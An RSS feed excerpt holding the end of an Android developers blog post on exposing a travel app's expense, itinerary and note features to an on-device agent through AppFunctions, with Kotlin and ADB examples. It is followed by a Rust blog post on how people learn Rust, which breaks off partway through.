src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi92OFxAOxVMpResmBcBoUfxzgcMmVOMn3mXQabB9O-xkC7pjYxrvXS7YLTEWLIBstwuDLc0ePCC-Tf7AKq62mgAXjSYg9-VUIjKvokK6BhGHqPDSXCTQowbpj40plsP3V3Ju3ck4gzNdJmGQ6C1-twuob2UnPu7oY9B_oSwnYSkaif7lSEMwFnStzWknM/s1600/AFD%20-%20%5BABL_104%5D%20JetPacker%20AppFunctions_Blog.png"></a></div><br><p><br></p><p>Welcome back to the blog post series "<a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-introduction-jetpack.html" target="_blank">Build intelligent Android apps</a>" where we take a basic Android app and transform it into a personalized, intelligent, and agentic experience. In our <a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-cloud-hybrid-inference.html">previous post</a>, we explored how to leverage Firebase AI Logic to build cloud-hosted and hybrid AI features.</p>Traditional mobile UIs excel at focused, hands-on tasks, and the Android intelligence system is introducing complementary features to make complex, multi-step actions even easier. By supplementing traditional user interfaces, AppFunctions provide a powerful new entry point: A privileged agent on the device can access app features in the background. This can be particularly helpful when users are driving, walking or otherwise multitasking. 

<p>In this article, we'll show you how we designed and integrated these capabilities into our travel planning app, <a href="https://github.com/android/ai-samples/tree/main/jetpacker">JetPacker</a>, using Android AppFunctions. We'll explore the rationale behind our feature choices, discuss the specialized tooling we used to accelerate development, and dive into the code that makes it all work.</p>

<h2>Designing AI-ready features: making choices that matter for your users</h2>

<p>To select which features to provide to the intelligence system, we looked for tasks where a voice or text command is objectively faster than tapping through screens. In this side-by-side screen recording you can see this contrast perfectly: on the left, a user tapping through multiple screens to log an expense; on the right, the same task completed instantly in the background via a privileged agent.</p>

<div class="vertical-video-grid">
  <div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIr2ssY2GiOlBmFzcP-91j91VjH9QX_sOP8FcmtirYPyXZmYRzNJmfqI_GT6aXYXye8-ntylv-gTNu1Qlnbx5gHiFn9naHqt7tJOQBA3HpQ5uz8XRdavXh7b3IP3FzJb4SsbC4mClGLUHupDwIeE9Du3PNRQr0SGs2lgHZTdHXnv8TagNBRtoJsbpeE6c/s960/Comp%201.gif"><img border="0" data-original-height="540" data-original-width="960" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIr2ssY2GiOlBmFzcP-91j91VjH9QX_sOP8FcmtirYPyXZmYRzNJmfqI_GT6aXYXye8-ntylv-gTNu1Qlnbx5gHiFn9naHqt7tJOQBA3HpQ5uz8XRdavXh7b3IP3FzJb4SsbC4mClGLUHupDwIeE9Du3PNRQr0SGs2lgHZTdHXnv8TagNBRtoJsbpeE6c/s1600/Comp%201.gif"></a></div><br><div class="vertical-video-wrapper"><br></div>

<p>Our first choice was expense tracking. Logging a coffee expense during a trip usually takes quite a few taps—unlocking the phone, opening the app, finding the active trip, navigating to the expenses tab, tapping the add button, taking a picture of the receipt, and checking the result. By providing the <code>addExpense</code> and <code>getExpenses</code> features as AppFunctions, the system agent handles the heavy lifting. When the user says, "Add a five-dollar coffee expense to my Paris trip," the agent automatically searches for the correct trip ID in the background and inserts the expense, skipping the manual UI flow entirely.</p>

<p>We also prioritized itinerary management. Finding what activity is next on a busy trip itinerary usually requires scrolling through a dense timeline view. By providing <code>getItinerary</code> and <code>addItineraryEvent</code> to the system, the user can simply ask, "What am I doing next in Paris?" and get an immediate answer.</p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRduisOXPFs0o2m-JwtESU1fUEanqH-A0eGt58MUuXs-vgN1af77M-j3ETdegzulBq-3TClrDvhO2K_8q4ep8xAlnW1y5T09ZxxHyZmTRtftA9DOmIk7ykfM_JihQ2c2fcUbEA-jCO1sgW2JnxN9qtB8IS58lbQoaIk4cPJPuPQavZNUoW2rNKo9r8g9M/s960/Comp%202.gif"><img border="0" data-original-height="540" data-original-width="960" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRduisOXPFs0o2m-JwtESU1fUEanqH-A0eGt58MUuXs-vgN1af77M-j3ETdegzulBq-3TClrDvhO2K_8q4ep8xAlnW1y5T09ZxxHyZmTRtftA9DOmIk7ykfM_JihQ2c2fcUbEA-jCO1sgW2JnxN9qtB8IS58lbQoaIk4cPJPuPQavZNUoW2rNKo9r8g9M/s1600/Comp%202.gif"></a></div><br><p><br></p>
  

<p>Finally, we focused on hands-free note capturing. Typing out reminders or notes while walking down a busy street is difficult and unsafe. Exposing a voice note capability allows the user to say, "The flight was amazing, I saw a beautiful sunset and managed to sleep well," and the privileged agent automatically transcribes and saves it directly into the travel database <span face="Roboto, sans-serif"> using the </span><span>addVoiceNote</span><span face="Roboto, sans-serif"> AppFunction.</span></p>

<h2>Android MCP powered by AppFunctions</h2>This entire experience is built on Android MCP. Under this design, the app acts as a local MCP server. Rather than remote APIs, you provide your app features directly to the on-device intelligence system.<br><br><a href="https://d.android.com/ai/appfunctions">Android AppFunctions</a> is the API that brings this concept to life. It reads annotated Kotlin functions and compiles them into type-safe, sandboxed tool definitions that the privileged agent can discover and invoke locally on the device.<div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjypEvh8lAK1myAWpnG4A0TtdIaTxP69t7g9croAJSUZ2Od6AEkhwMusN3CvdGohdvYzoh1UaCxCHb22oJzCD_4B2K8vfQzcyAIaTl8lk3TCR9T0SoMHjjaDk4GMxxPazeCfT0aF7rifm7-LAvcMhyphenhyphenryDJpOPYon7jiISKB2sMLzAwHDuKFxIv16sDXjrM/s2500/Android%20MCP%20diagram.png"><img border="0" data-original-height="1406" data-original-width="2500" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjypEvh8lAK1myAWpnG4A0TtdIaTxP69t7g9croAJSUZ2Od6AEkhwMusN3CvdGohdvYzoh1UaCxCHb22oJzCD_4B2K8vfQzcyAIaTl8lk3TCR9T0SoMHjjaDk4GMxxPazeCfT0aF7rifm7-LAvcMhyphenhyphenryDJpOPYon7jiISKB2sMLzAwHDuKFxIv16sDXjrM/s1600/Android%20MCP%20diagram.png"></a></div><br><p><br></p>

<p><br></p><p><br></p><p><br></p><p><br></p><p><br></p><i><div><i>Diagram highlighting our apps, the android platform, and system agents coordinate AppFunctions.</i></div></i><p>Under the Android MCP model, your app acts as a local MCP server that exposes structured tools, while the Android platform serves as the central tool registry. On the MCP client side, agent apps are registered with the intelligence system after being granted system-privileged permissions to access the registry.</p>

<p>When a user interacts with a registered agent, its LLM determines if the request can be handled by an AppFunction, queries the platform's metadata, and executes the appropriate registered functions in the background. This local MCP client-server design gives you full control: you choose exactly which features are accessible to the agent, keeping the rest of your app's data private.</p>

<h2>How we accelerated development with Android skills</h2>

To streamline the integration process, we leveraged the <a href="https://github.com/android/skills/tree/main/device-ai/appfunctions">AppFunctions development skill</a>. The AppFunctions development skill is a complete development companion. It guided us through the entire lifecycle: mapping Kotlin data classes to serialize parameters, generating the necessary <code>Service</code> entry points, refining our <code>KDoc</code> documentation to ensure the LLM understands parameter boundaries, and setting up automated testing using ADB.

<h2>Providing app features to the intelligence system</h2>

<p>Enough with the theory, let's dive into the implementation.</p>

<h4>Configuration and dependency setup</h4>

<p>We begin by adding the AppFunctions dependencies. One for the API and one for the Kotlin Symbol Processing compiler.</p>

<pre><code>implementation("androidx.appfunctions:appfunctions:1.0.0-alpha10")
ksp("androidx.appfunctions:appfunctions-compiler:1.0.0-alpha10")</code></pre>

<h4>Modeling custom data types</h4>

<p>Any custom object exchanged with the agent must be annotated with <code>@AppFunctionSerializable</code>. In our <a href="https://github.com/android/ai-samples/tree/main/jetpacker/android/feature/appfunctions/src/main/java/com/example/jetpacker/feature/appfunctions/TripSerializable.kt">TripSerializable.kt</a> file, we define our trip data model:</p>

<pre><code>@AppFunctionSerializable(isDescribedByKDoc = true)
data class TripSerializable(
    /** The trip's unique identifier. */
    val id: String,
    /** The trip's title. */
    val title: String,
    /** The trip's destination location. */
    val location: String,
    /** The trip's start date in milliseconds. */
    val startDate: Long,
    /** The trip's end date in milliseconds. */
    val endDate: Long,
    /** A list of participants. */
    val participants: List&lt;String&gt;,
)</code></pre>

<h4>Providing features using the @AppFunction annotation</h4>

<p>Next, the skill wrote the Kotlin functions that perform the database queries and annotate them with <code>@AppFunction</code>. We can view this in searchTrip:</p>

<pre><code>/**
 * Looks for trips based on optional filters like id, title (name), location, and dates.
 *
 * @param id The unique identifier of the trip.
 * @param title The title or name of the trip.
 * @param location The destination location.
 * @param startDate The minimum start date in milliseconds.
 * @param endDate The maximum end date in milliseconds.
 * @return A list of trips matching the filters.
 */
@AppFunction(isDescribedByKDoc = true)
suspend fun searchTrip(
    id: String? = null,
    title: String? = null,
    location: String? = null,
    startDate: Long? = null,
    endDate: Long? = null
): List&lt;TripSerializable&gt; {
    return withContext(Dispatchers.IO) {
    // implementation
}</code></pre>

<p>Since AppFunctions run on the UI thread by default, we use <code>withContext(Dispatchers.IO)</code> to switch to a background dispatcher. Additionally, we refine our KDoc to use clear, imperative verbs and specify parameter constraints. This documentation compiles directly into the tool's schema, which the privileged agent uses to resolve parameters and handle runtime errors.</p>

<h4>The service entry point and Hilt integration</h4>

<p>To register these features with the intelligence system, we create an abstract base class that extends <code>AppFunctionService</code>. We annotate it with <code>@AppFunctionServiceEntryPoint</code>:</p>

<pre><code>@RequiresApi(36)
@AndroidEntryPoint
@AppFunctionServiceEntryPoint(
    serviceName = "JetPackerAppFunctionService",
    appFunctionXmlFileName = "jetpacker_app_function_service"
)
abstract class BaseJetPackerAppFunctionService : AppFunctionService() {
    @Inject internal lateinit var tripDao: TripDao
    // DAOs and database references are injected here...
}</code></pre>

<p>During compilation, KSP generates the final concrete service subclass, <code>JetPackerAppFunctionService</code>, as declared with the <code>serviceName</code> parameter. We also register <code>app_metadata.xml</code> in the app's manifest. This file provides global operational rules for JetPacker's declared AppFunctions.</p>

<h2>Testing and verifying your AppFunctions</h2>

<p>Once implemented, you should verify that your AppFunctions are registered and working correctly.</p>

<p>Running devices or emulators with Android 17 or newer, you can use ADB commands from your terminal to list and invoke your functions. Running <code>adb shell cmd app_function list-app-functions</code> displays all registered functions for your package. You can then execute a specific function and test its database integration by running <code>adb shell cmd app_function execute-app-function</code> while passing a raw JSON parameters string.</p>

<p>Instead of these ADB commands, you can also use the <a href="https://github.com/android/appfunctions">AppFunctions Testing Agent</a> to inspect your configuration, list and execute AppFunctions, and even see how your AppFunctions behave in a real conversational flow.</p>

<h2>Wrapping it up</h2>

<p>When thinking about app features that can be contributed to the intelligence system using AppFunctions requires a slight shift in how we think about code and documentation. AppFunctions enable you to use this new interaction model for apps, which allows using an agent to access app features..</p>

<p>First, the <a href="https://github.com/android/skills/tree/main/device-ai/appfunctions">AppFunctions development skill</a> is an essential lifecycle tool, helping you discover features, implement and refine AppFunctions for your apps. Second, KDoc comments are a compiled API asset; clear parameter descriptions directly impact the execution accuracy of the system agent. Finally, Android MCP provides local-first execution allowing apps to safely collaborate with AI agents.</p>

<p>Contributing app features through AppFunctions makes your application ready for the intelligence system. Let us know how you are adapting your apps for the agentic era!</p>

<h2>Learn more</h2>

<p>Check out the other parts of this blog post series:<br><b><a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-introduction-jetpack.html">Part 1:</a></b> Introduction of the app and a high-level overview.<br><a href="http://android-developers.googleblog.com/2026/07/android-on-device-inference.html"><b>Part 2:</b></a> On-device intelligence. Deep-dive into ML Kit’s GenAI APIs and Gemini Nano to build privacy-first features like itinerary summarization, receipt parsing, and local audio processing.<br><b><a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-cloud-hybrid-inference.html">Part 3:</a></b> Hybrid and cloud reasoning. Explore how to use Firebase AI Logic to ground LLM answers in real-world data like Google Maps and web context.<br><a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-appfunctions.html"><b>Part 4 (this post!):</b></a> System integration. Integrating with the Android intelligence system using AppFunctions. <br>Part 5 (coming soon): In-app agentic workflows. Extend the app with an end-to-end booking assistant powered by A2UI and ADK.</p>

<p>Interested in more on Android Development? Follow Android Developers on <a href="https://www.youtube.com/@AndroidDevelopers">YouTube</a> or <a href="https://www.linkedin.com/showcase/androiddev/">LinkedIn</a>!</p>

<p>
  All code snippets in this blog post follow the following copyright notice:
</p>
<pre><code>Copyright 2026 Google LLC.
SPDX-License-Identifier: Apache-2.0</code></pre></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Rust Programming Language Blog: The many journeys of learning Rust]]></title>
<description><![CDATA[This is another post in our series covering what we learned through the Vision Doc process. We previously described the overall approach and what we learned about doing user research, we explored what people love about Rust, dug into what it takes to ship safety-crticial Rust, and described some ...]]></description>
<link>https://tsecurity.de/de/3693289/tools/the-rust-programming-language-blog-the-many-journeys-of-learning-rust/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693289/tools/the-rust-programming-language-blog-the-many-journeys-of-learning-rust/</guid>
<pubDate>Sat, 25 Jul 2026 08:37:24 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><em>This is another post in our series covering what we learned through the Vision Doc process. We previously <a href="https://blog.rust-lang.org/2025/12/03/lessons-learned-from-the-rust-vision-doc-process/" rel="external">described the overall approach and what we learned about doing user research</a>, we <a href="https://blog.rust-lang.org/2025/12/19/what-do-people-love-about-rust/" rel="external">explored what people love about Rust</a>, <a href="https://blog.rust-lang.org/2026/01/14/what-does-it-take-to-ship-rust-in-safety-critical/" rel="external">dug into what it takes to ship safety-crticial Rust</a>, and <a href="https://blog.rust-lang.org/2026/03/20/rust-challenges/" rel="external">described some of the major challenges that people face when using Rust</a>.</em></p>
<p>In this post we walk through what folks have found on their journey to learn the Rust programming language with ups and downs covered.</p>
<p>As a disclaimer, LLMs (Large Language Models) come up in this post because our interviewees brought them up. We're scoping discussion to their use as a learning tool, covering research and example generation, not broader questions about AI (Artificial Intelligence) in software development.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#many-paths-to-needing-rust"></a>
Many paths to needing Rust</h3>
<p>The interviews surfaced several different paths into Rust: curiosity, embedded work, job-market pressure, organizational adoption, and reassignment after a team or company chose Rust. That last path matters because many learners are not evaluating Rust from a blank slate; they are trying to become productive after Rust has already arrived in their work.</p>
<blockquote>
<p>"Funny enough, I've advocated for more niche languages than Rust in the past. Rust has pretty much stopped being as much of a niche language as it was, but it's not Java." -- Fractional CTO</p>
</blockquote>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#rust-learning-resources"></a>
Rust learning resources</h3>
<p>Likely as expected, the folks that we talked to reach for a range of resources to learn Rust. Some reach for official documentation, such as <a href="https://doc.rust-lang.org/book/" rel="external">The Rust Programming Language Book</a> and find that sufficient to build on what the compiler was already showing them.</p>
<blockquote>
<p>"I started with the official Rust documentation because there are a lot of great examples of how features like the borrow checker work." -- Software engineer at an Automotive supplier</p>
</blockquote>
<p>Others needed more passes and more formats, sometimes reaching for resources the community maintains, such as <a href="https://rustlings.rust-lang.org/" rel="external">Rustlings</a>, <a href="https://danielkeep.github.io/tlborm/book/index.html" rel="external">The Little Book of Rust Macros</a>, and <a href="https://rust-unofficial.github.io/too-many-lists/" rel="external">Learn Rust With Entirely Too Many Linked Lists</a>.</p>
<blockquote>
<p>"The first time I went through the chapter in [The Rust Programming Language] on borrow checking, I was like, what is this? I read it again, then I watched a YouTube video of someone explaining the chapter." -- Rust freelance consultant</p>
</blockquote>
<blockquote>
<p>"Rust book, Rustlings, Zero to Production in Rust, Jon Gjengset tutorials. A bunch of books. It's not a one-pass reading. Can't say how many times I've gone through it." -- Software engineer working on video streaming and storage</p>
</blockquote>
<p>These resources have brought up an entire generation of Rust programmers. But, to some, there is a perception that these resources have trouble keeping pace with the language.</p>
<blockquote>
<p>"We'd like to use [The Rust Programming Language/'the book'], but we've found that it's out of date, unfortunately. We've looked at the GitHub repo and found it's got a lot of unresolved issues and unmerged PRs" -- Principal Software Engineering work on Rust adoption in a regulated industry</p>
</blockquote>
<p>Whether or not this is factually true, Rust's growth has nonetheless put more scrutiny on these materials. Companies evaluating adoption and engineers getting reassigned to Rust teams are looking at them with fresh eyes and finding the gaps that affect their own evaluation.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#beginner-stumblings-and-unlearning-habits"></a>
Beginner stumblings and unlearning habits</h3>
<p>It's pretty typical for Rust to be the 2nd, 3rd or Nth programming language that someone picks up. They'd end up writing their most familiar language in Rust, whether C++ patterns, Java patterns, or whatever they knew, for months or even years. Eventually they got comfortable enough to start writing idiomatic Rust.</p>
<blockquote>
<p>"There's a bit of a drop in productivity compared to C if you're already familiar with it just because you're learning new rules, new syntax."  -- Principal Firmware Engineer (mobile robotics)</p>
</blockquote>
<blockquote>
<p>"In the beginning it was more poking around the code and adding and removing some ampersands and asterisks to try to make sense of <code>mut</code> and not <code>mut</code> and whatever." -- Senior engineer with 20 years of Java experience in cloud and IoT</p>
</blockquote>
<p>We also spoke with someone who found that not having much of a programming background seemed to benefit people picking up Rust. Not having worn-in grooves from other languages may play a role here, and it's worth investigating further.</p>
<blockquote>
<p>"I had someone who had never programmed much before start working on the internals of [our Rust project]. She was just fine with getting into Rust. It's more of the senior people that struggle as they need to unlearn practices which may work in other languages, but it's not the 'Rust' way." -- Researcher, Automotive OEM R&amp;D Lab</p>
</blockquote>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#learning-to-work-with-the-borrow-checker"></a>
Learning to work with the borrow checker</h3>
<p>We heard a lot about learning to work with the borrow checker instead of against it. People get there through different paths, but a few patterns came up repeatedly.</p>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#the-compiler-as-teacher"></a>
The compiler as teacher</h4>
<p>Rust's diagnostics did the teaching on their own, especially around lifetimes.</p>
<blockquote>
<p>"If you mess up the lifetimes in a piece of code that you've written by hand, I usually find that Rust's diagnostics are very helpful" -- Researcher working on static analysis of Rust programs</p>
</blockquote>
<blockquote>
<p>"Whatever's missing, the compiler usually fills in: it tells me 'you need to declare the lifetime of this reference', so I know and can figure it out. That all generally works pretty well." -- Senior Software Engineer</p>
</blockquote>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#learning-by-doing"></a>
Learning by doing</h4>
<p>Others felt like they only really internalized the borrow checker after writing a lot of Rust. It took projects, coding challenges, prototyping and so on until at some point it clicked.</p>
<blockquote>
<p>"I actually did not understand the borrow checker until I spent a lot of time writing Rust" -- Founder of a startup built on Rust</p>
</blockquote>
<blockquote>
<p>"Besides the prototyping work, I also did coding-challenge-type stuff to get familiar with Rust for Advent of Code. [..] It eventually clicked to the point where I wasn't fighting with Rust, it was working for me. I had that experience other people describe: when I managed to get my program to fit with Rust, it worked. I didn't spend time debugging." -- Principal Software Engineer, large SaaS provider</p>
</blockquote>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#letting-go-of-clone-guilt"></a>
Letting go of "clone guilt"</h4>
<p>Some learners arrive with the assumption that good Rust means zero clones, zero copies, lifetimes threaded through everything. They set the bar at optimal before they've learned how to write idiomatic Rust, and it makes the borrow checker feel harder than it needs to be at the outset.</p>
<blockquote>
<p>"On one of my first projects, I was like, 'I don't ever want to copy or clone anything,' so I carefully wove through all the lifetimes and got myself into a bit of a bind. Then I saw someone else just cloning the struct I was working with, and it was super cheap. Sometimes you can just clone and it's going to be okay." -- Researcher at a university</p>
</blockquote>
<p>The experienced Rust developers we spoke with consistently said the same thing: clone freely while you're learning, then optimize when you understand the problem. Rust's reputation for performance and correctness feeds this. Newcomers assume anything less than optimal is wrong before they've written a first working program, and clone guilt is how that shows up.</p>
<p>We think it could be an interesting area of future study to check into the patterns Rust programmers employ at different levels of experience and under which circumstances. One member of the Rust Vision doc team that's very experienced with Rust noted that there's kind of an "expected shape" they understand as passing the compiler. This knowledge influences how they approach writing code which wouldn't take that shape and they naturally find themselves understanding when to use so-called workarounds, such as passing around indices into arrays or <code>Vec</code>s.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#multi-paradigm-but-not-the-oop-some-are-used-to"></a>
Multi-paradigm, but not the OOP some are used to</h3>
<p>The Rust programming language is multi-paradigm, and how that lands depends on what you're coming from. We heard some that came from a functional background were delighted with digging into learning how much Rust inherits from that lineage. Some others noted that they and others on their teams struggled to unlearn the object-oriented style they'd come to use heavily in other languages like C++ and Java.</p>
<blockquote>
<p>"Developers coming from C++ tend to think object-oriented. I think that's a difference between C++ and Rust." -- Architect at Automotive OEM</p>
</blockquote>
<blockquote>
<p>"I had exactly that thing, where I would apply all my years of Java and JS thinking, where I could just create some object, not care about it, return it, have it sloshing around between various functions. Found myself reaching for these patterns and then being told 'no, you cannot do that'." -- Principal Engineer at a SaaS company</p>
</blockquote>
<p>Developers coming from functional programming had less to unlearn: strong typing, pattern matching, and an expression-oriented style were already familiar.</p>
<blockquote>
<p>"My background has been more functional programming, strong typing. That originated for me as a Lisper: once a Lisper, always a Lisper." -- Principal Software Engineer working on Rust tooling for safety-regulated industries</p>
</blockquote>
<blockquote>
<p>"The languages I primarily used before Rust were things like OCaml. Way back, I came from C and C++, the classic languages, and then I spent quite a long time doing primarily pure functional stuff. These days I've ended up back in what I like to think of as a pragmatic center ground [with Rust]." -- Fractional CTO</p>
</blockquote>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#teaching-rust-in-academia"></a>
Teaching Rust in academia</h3>
<p>We spoke with a university professor that's been teaching Rust generally. In the academic environment, they were able to use proxies for some things such as "traits are like interfaces in Java" because the students had already gone through a set of courses in their first and second years that taught them Java. They introduced concepts slowly throughout the course, choosing to deal with some more complex topics like generics later. The outcome generally was that students had no problem picking up Rust in this setting.</p>
<blockquote>
<p>"I couldn't see any big difference on the embedded side. We also teach an embedded class, and we did an experiment. Half of the students' feedback was worse on the Rust class, mostly because they needed to build the project themselves. The C students just got one from [an LLM], absolutely no problem." -- University Professor, on teaching Rust</p>
</blockquote>
<p>The C cohort leaned on LLMs for the project in ways the Rust cohort couldn't. We don't yet have a clear answer for why.</p>
<p>What did come through clearly was the Rust cohort's experience with the community. Some students needed to figure out which drivers to use for the embedded project and how to use them. Their professor encouraged them to open issues and ask questions directly on GitHub, and the maintainers responded. Students who had never contributed to open source before were getting answers from the people who wrote the code.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#learning-using-llms"></a>
Learning using LLMs</h3>
<p>Some experienced folks shared that they saw LLMs as a tool that can help someone come up to speed quickly, either as a research tool or for generating example Rust code to understand concepts.</p>
<blockquote>
<p>"I'm optimistic that there's a way to work [LLMs] in that will cut down that learning curve. One of the big things these tools bring is reducing the learning curve in general; these are very good tools to help you navigate a space that you don't know yet." -- Maintainer of large open source Rust crate</p>
</blockquote>
<blockquote>
<p>"I try [LLMs] out once a month, usually for generating an example or something like this. Just like with Stack Overflow: when you read an example, you should read it carefully and try to understand it. Not copy and paste it, but type it in your own words in code and then check it, because that's where the teeny tiny little mistakes are." -- Founder of startup built on Rust</p>
</blockquote>
<p>For some learners, an LLM is just another way to find answers, no different than a search engine.</p>
<blockquote>
<p>"So for the most part, picking up Rust - how do I learn? I'll [use web search for] things, I'll ask [an LLM], I'll just poke around and read the code." -- Senior Software Engineer working in a regulated space</p>
</blockquote>
<p>One founder went further and claimed that LLMs change who can become a Rust developer. One consulting company founder described hiring high school graduates with no systems programming background and training them as Rust developers, with LLMs filling in the learning gaps that would previously have required years of experience.</p>
<blockquote>
<p>"At the beginning, I was worried, but now that we have [LLMs] supporting development, the difficulty of the language doesn't matter. I'm seeing a huge opportunity behind strong runtime languages like Rust. [..] In [Developing Country] we hire 20-25 high school graduates, train them to be Rust programmers, then they enhance our workforce worldwide." -- Founder of a consulting company</p>
</blockquote>
<p>We heard this from one organization. This is a claim that the combination of Rust's compiler and LLM tooling can dramatically shorten the path from beginner to working developer. Whether it generalizes depends on questions we can't answer from a single interview: how long these developers stay, what kind of code they can maintain independently, and whether this training/learning model works outside this company's particular structure. If it holds up, the pool of people who can become Rust developers is much larger than the usual hiring profile suggests.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#organizational-considerations-for-rust-learners"></a>
Organizational considerations for Rust learners</h3>
<p>We spoke with a number of folks on teams that are using Rust in larger organizations. Teams wanted to know that everyone would end up at roughly the same level of competence, which led a good number to invest in training courses to get there. Some leaders found that staff was able to ramp well enough by reading The Rust Programming Language, going through Rustlings, and then picking up lower risk and priority tickets to work on. Having a sense of community was also important within companies; it helps people know they are not alone when they are asked to work on Rust after, say, a reorganization happens.</p>
<blockquote>
<p>"[..] the idea with the class as opposed to 'just read the Rust book on your own' was that this gives everyone kind of the same baseline going in."  -- Principal Firmware Engineer (mobile robotics)</p>
</blockquote>
<blockquote>
<p>"So typically we're going to have people work through Rustlings, work through The Rust Programming Language. We have them then start to pick up lower risk tickets to work on." -- Principal Engineer at a large SaaS provider</p>
</blockquote>
<blockquote>
<p>"We've got an internal Slack channel for Rust learning where people can drop questions and others will come in and answer them. That helps build up understanding and community." -- Software Engineer at a large corporation</p>
</blockquote>
<p>Some organizations found that while the person they'd hire would need to learn Rust, it was still preferable to the alternative of hiring someone for a critical piece of software written in another language.</p>
<blockquote>
<p>"They needed to grow and maintain this C++ codebase. They had a C++ wizard, and they tried for about two years to find someone with the same level of expertise. They ended up hiring people that didn't know Rust and ramping them up, creating FFI bindings from the C++ side so they could work in Rust. And you can feel it: the borrow checker is teaching these people the right way to handle their systems." -- Principal Engineer at an Automotive OEM</p>
</blockquote>
<p>The community and helping each other aspect seems to grow bonds as organizations mature.</p>
<blockquote>
<p>"Our team is [all about] mentorship. I've mentored people coming up to speed on Rust, and people help each other hugely." -- Principal Software Engineer at a large SaaS company</p>
</blockquote>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#silent-attrition"></a>
Silent attrition</h3>
<p>We identified some cases where people have approached Rust and bounced off of it, for one reason or another. In the below case, someone with a background in a language with fewer guardrails found themselves frustrated enough with Rust to walk away.</p>
<blockquote>
<p>"All of that means that that embedded ecosystem is very frustrating to somebody who comes from C and is like, why can't I just get a pointer to this peripheral and then write into the registers. What are you doing to me? [..] My friend never got over that. He looked at it and said, I'm not going to deal with this and walked away." -– A second University Professor</p>
</blockquote>
<p>There may be language features that for a particular domain are not seen as comfortable or usable yet, such as async Rust usage in a safety domain. We'd like to map which language features feel off-limits in which domains; async in safety-critical work probably isn't the only case.</p>
<blockquote>
<p>"We're not fully sure how async [Rust] will work out in the long run in our domain. [..] People don't feel comfortable yet since C++14 doesn't provide such concepts. [..] It's the chicken-and-egg problem again: we probably need to gain some experience to see whether we can actually benefit from these new concepts in the automotive and safety domains." -- Team Lead at Automotive Supplier (ASIL D target)</p>
</blockquote>
<p>We heard in at least one case, that while the language was challenging and there was a near bounce, the tooling helped keep them coming back and trying.</p>
<blockquote>
<p>"Well, I think my early impressions of Rust - one is I find C++ so intimidating, and I think a big part of why I was able to succeed at [..] learning Rust is the tooling. I mean, all this makes sense [..] but it's like, for me, getting started with Rust, the language was challenging, but the tooling was incredibly easy." -- Founder of another startup built on Rust</p>
</blockquote>
<p>While it might be considered more of a community concern, if there are interactions online and in spaces that point to learners having
so-called "skill issues" this feeds into the narrative that Rust must be hard to learn. We may be unintentionally turning away Rust Project contributors and maintainers due to the vibes being put out when new learners show up in certain spaces.</p>
<blockquote>
<p>"People are very helpful, but generally the attitude is: if your program is very complicated, it's mostly a skill issue. There's not that much empathy when people get stuck learning, and a lot of people are just pushed away by it. There's probably a huge number of people who silently stop wanting to write Rust, because at some point it gets complicated and the feedback they get is 'you just need to be a better programmer, obviously'." -- Software Engineer at a SaaS Provider</p>
</blockquote>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#feedback-on-near-bounces-from-survey"></a>
Feedback on near-bounces from survey</h4>
<p>We found a few interesting perspectives collected in the Rust Vision doc survey which we administered with examples of bouncing and coming back:</p>
<blockquote>
<p>"I started before 1.0, got stuck very soon when trying to translate patterns from C++ to Rust (due to borrow checking). I tried again after 1.0 and it stuck. [..]" -- Survey Respondent A</p>
</blockquote>
<p>Survey Respondent A went on to share in a more detailed response about a perceived weakness in Rust learning materials related to lifetimes and the borrow checker are explained. There was an observation that it's fairly easy to run into more complex situations with lifetimes and the borrow checker. They felt that the current state of this sort of material and tutorials is fairly superficial and can leave learners stuck when they run into those more complex situations.</p>
<p>One respondent that bounced once and came back shared challenges around usage of async. In concert with Rust's memory-safety and the borrow checker, they found some of the nitty-gritty details of async were difficult to learn. While we're aware of the Rust Project's continuous efforts to improve Rust's async story, this is another data point of a user that faced challenges.</p>
<p>Another survey respondent shared how they had multiple times bounced in trying to learn Rust. They returned after a year or so and found Rustlings to be highly motivating. We note that having multiple pathways for folks to learn Rust opens up more possibilities for those that nearly bounced, just like this person.</p>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#need-more-focused-work-on-silent-attritrion"></a>
Need more focused work on silent attritrion</h4>
